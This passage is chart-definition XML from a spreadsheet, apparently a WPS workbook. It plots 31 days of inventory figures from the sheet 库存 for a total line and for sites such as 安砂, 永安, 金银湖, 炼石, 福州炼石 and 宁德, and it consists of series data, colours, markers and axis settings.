                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>合计</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:tint val="76667"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="dash"/>
            <c:size val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="808000"/>
              </a:solidFill>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="80800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库存!$E$12:$AI$12</c:f>
              <c:numCache>
                <c:formatCode>0.00</c:formatCode>
                <c:ptCount val="31"/>
                <c:pt idx="0">
                  <c:v>36.717823700005</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>36.262008400005</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>35.470125400005</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>34.364488500005</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>33.707066800005</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>33.314823700005</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>32.910728700005</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>32.607416700005</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>32.374782400005</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>32.441524400005</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>31.643674400005</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>30.319487700005</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>29.515802700005</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>28.826344700005</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>27.867925200005</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>27.370669200005</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>26.902682100005</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>26.0875697000051</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>25.5078260000051</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>25.0200160000051</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>23.9564050000051</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>23.1633580000051</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>21.9716585000051</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>20.3472475000051</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>19.5340055000051</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>18.5523832000051</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>17.5387602000051</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>16.5797752000051</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>15.1767952000051</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>14.0850227000051</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>13.5024337000051</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:marker val="1"/>
        <c:smooth val="0"/>
        <c:axId val="211204352"/>
        <c:axId val="211210240"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="211180544"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:majorGridlines>
          <c:spPr>
            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="808080">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
        </c:majorGridlines>
        <c:numFmt formatCode="0" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:spPr>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="808080">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
          <a:effectLst/>
        </c:spPr>
        <c:txPr>
          <a:bodyPr rot="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1202816"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="211202816"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>
        <c:majorGridlines>
          <c:spPr>
            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="808080">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
        </c:majorGridlines>
        <c:numFmt formatCode="0.00" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:spPr>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="808080">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
          <a:effectLst/>
        </c:spPr>
        <c:txPr>
          <a:bodyPr rot="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1180544"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:catAx>
        <c:axId val="211204352"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="0"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1210240"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="211210240"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="r"/>
        <c:numFmt formatCode="0.00" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:spPr>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="808080">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
          <a:effectLst/>
        </c:spPr>
        <c:txPr>
          <a:bodyPr rot="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1204352"/>
        <c:crosses val="max"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:spPr>
        <a:solidFill>
          <a:srgbClr val="FFFFFF">
            <a:alpha val="100000"/>
          </a:srgbClr>
        </a:solidFill>
        <a:ln w="9525">
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.00513874614594095"/>
          <c:y val="0.205087440381558"/>
          <c:w val="0.0652500451832044"/>
          <c:h val="0.440250032338978"/>
        </c:manualLayout>
      </c:layout>
      <c:overlay val="0"/>
      <c:spPr>
        <a:noFill/>
        <a:ln w="3175">
          <a:noFill/>
        </a:ln>
      </c:spPr>
      <c:txPr>
        <a:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:defRPr lang="zh-CN" sz="77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legend>
    <c:plotVisOnly val="1"/>
    <c:dispBlanksAs val="gap"/>
    <c:showDLblsOverMax val="0"/>
    <c:extLst>
      <c:ext uri="{0b15fc19-7d7d-44ad-8c2d-2c3a37ce22c3}">
        <chartProps xmlns="https://web.wps.cn/et/2018/main" chartId="{ca3f4406-c132-4106-9697-d867de64a0a4}"/>
      </c:ext>
    </c:extLst>
  </c:chart>
  <c:spPr>
    <a:solidFill>
      <a:srgbClr val="FFFFFF">
        <a:alpha val="100000"/>
      </a:srgbClr>
    </a:solidFill>
    <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
      <a:solidFill>
        <a:srgbClr val="808080">
          <a:alpha val="100000"/>
        </a:srgbClr>
      </a:solidFill>
      <a:prstDash val="solid"/>
      <a:round/>
    </a:ln>
    <a:effectLst/>
  </c:spPr>
  <c:txPr>
    <a:bodyPr/>
    <a:lstStyle/>
    <a:p>
      <a:pPr>
        <a:defRPr lang="zh-CN" sz="10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301210466406"/>
          <c:y val="0.0381558028616852"/>
          <c:w val="0.736896567125157"/>
          <c:h val="0.855325914149511"/>
        </c:manualLayout>
      </c:layout>
      <c:lineChart>
        <c:grouping val="standard"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>库存!$C$15</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>安砂</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:shade val="76667"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="diamond"/>
            <c:size val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="666699"/>
              </a:solidFill>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="666699"/>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库存!$E$15:$AI$15</c:f>
              <c:numCache>
                <c:formatCode>0.00</c:formatCode>
                <c:ptCount val="31"/>
                <c:pt idx="0">
                  <c:v>8.147371</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>7.999705</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>7.758121</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>7.553625</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>7.983661</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>8.015097</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>8.052867</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>7.884691</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>7.545033</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>7.410767</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>7.033505</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>6.892883</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>6.767855</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>6.591835</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>6.696569</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>6.741053</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>6.729127</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>6.500069</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>6.425901</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>6.485159</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>6.514431</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>6.612936</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>6.57391</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>6.594666</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>6.50483</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>6.204132</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>5.98144</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>5.829806</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>5.655542</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>5.313312</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>4.989514</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>库存!$C$16</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>永安</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:shade val="76667"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="square"/>
            <c:size val="5"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="993366"/>
              </a:solidFill>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="993366"/>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库存!$E$16:$AI$16</c:f>
              <c:numCache>
                <c:formatCode>0.00</c:formatCode>
                <c:ptCount val="31"/>
                <c:pt idx="0">
                  <c:v>6.180377</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>6.002835</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>6.027317</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>5.957003</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>5.922614</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>5.860371</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>5.559012</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>5.653344</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>5.78674</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>6.079501</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>6.402381</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>6.507767</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>6.577074</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>6.685336</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>6.660216</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>6.504526</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>6.369995</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>6.598182</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>6.628708</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>6.576481</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>6.482791</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>6.238547</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>6.082698</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>6.028653</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>5.76807</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>5.543536</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>5.60701</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>5.412073</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>5.283648</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>5.12392</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>4.915923</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>库存!$C$17</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v/>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:shade val="76667"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="triangle"/>
            <c:size val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="80808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库存!$E$17:$AI$17</c:f>
              <c:numCache>
                <c:formatCode>0.00</c:formatCode>
                <c:ptCount val="31"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:strRef>
              <c:f>库存!$C$18</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>金银湖</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:shade val="76667"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="x"/>
            <c:size val="7"/>
            <c:spPr>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="666699"/>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库存!$E$18:$AI$18</c:f>
              <c:numCache>
                <c:formatCode>0.00</c:formatCode>
                <c:ptCount val="31"/>
                <c:pt idx="0">
                  <c:v>2.571026</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2.537126</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2.493676</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>2.458976</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>2.435826</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>2.604924</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>2.559259</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>2.481284</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>2.400291</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>2.302298</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>2.396452</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>2.327857</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>2.435885</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>2.280148</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>2.368856</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>2.236405</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>2.116502</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>2.225326</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>2.135247</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>2.250628</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>2.162821</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>2.032149</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>2.149808</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>2.046598</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>1.931861</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>2.12741</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>2.237207</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>2.158503</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>2.071795</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>2.213038</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>2.329071</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="4"/>
          <c:order val="4"/>
          <c:tx>
            <c:strRef>
              <c:f>库存!$C$19</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>炼石</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:shade val="76667"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="star"/>
            <c:size val="7"/>
            <c:spPr>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="33CCCC"/>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库存!$E$19:$AI$19</c:f>
              <c:numCache>
                <c:formatCode>0.00</c:formatCode>
                <c:ptCount val="31"/>
                <c:pt idx="0">
                  <c:v>4.87517339999998</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>4.60740039999998</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>4.63488409999998</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>4.88438379999998</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>5.18435969999998</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>5.29246769999998</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>5.27002579999998</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>5.29489879999998</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>5.29194149999998</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>4.97678449999998</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>4.95935949999998</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>4.90232749999998</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>4.88784639999998</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>4.92974239999998</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>4.75160689999998</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>4.39820589999998</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>4.13499329999998</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>3.75950419999998</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>3.25270149999998</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>2.89145049999998</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>2.71019049999998</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>2.79914849999998</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>2.86959489999998</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>2.97227069999998</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>2.90910169999998</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>3.17261169999998</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>3.22355269999998</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>3.32041399999998</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>3.29631999999998</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>3.46119019999998</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>3.58576689999998</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="5"/>
          <c:order val="5"/>
          <c:tx>
            <c:strRef>
              <c:f>库存!$C$20</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>福州炼石</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:shade val="76667"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="5"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FF8080"/>
              </a:solidFill>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="FF808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库存!$E$20:$AI$20</c:f>
              <c:numCache>
                <c:formatCode>0.00</c:formatCode>
                <c:ptCount val="31"/>
                <c:pt idx="0">
                  <c:v>3.72303399999999</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>3.58647099999999</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>3.50020899999999</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>3.61428999999999</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>3.44969899999999</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>3.63576599999999</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>3.64487999999999</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>3.72026599999999</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>3.57609899999999</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>3.47562399999999</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>3.42129499999999</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>3.39408199999999</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>3.46327499999999</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>3.36331899999999</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>3.35713699999999</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>3.33519799999999</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>3.36731899999999</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>3.29007899999999</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>3.23617799999999</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>3.11996999999999</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>3.36298699999999</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>3.23921099999999</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>3.23179499999999</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>3.37697099999999</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>3.38872099999999</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>3.38536999999999</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>3.39890899999999</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>3.57274299999999</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>3.56218199999999</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>3.76658299999999</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>3.76131699999999</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="6"/>
          <c:order val="6"/>
          <c:tx>
            <c:strRef>
              <c:f>库存!$C$21</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v/>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:tint val="76667"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="plus"/>
            <c:size val="7"/>
            <c:spPr>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="333399"/>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库存!$E$21:$AI$21</c:f>
              <c:numCache>
                <c:formatCode>0.00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smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="7"/>
          <c:order val="7"/>
          <c:tx>
            <c:strRef>
              <c:f>库存!$C$22</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>宁德</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:tint val="76667"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="dot"/>
            <c:size val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="993300"/>
              </a:solidFill>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
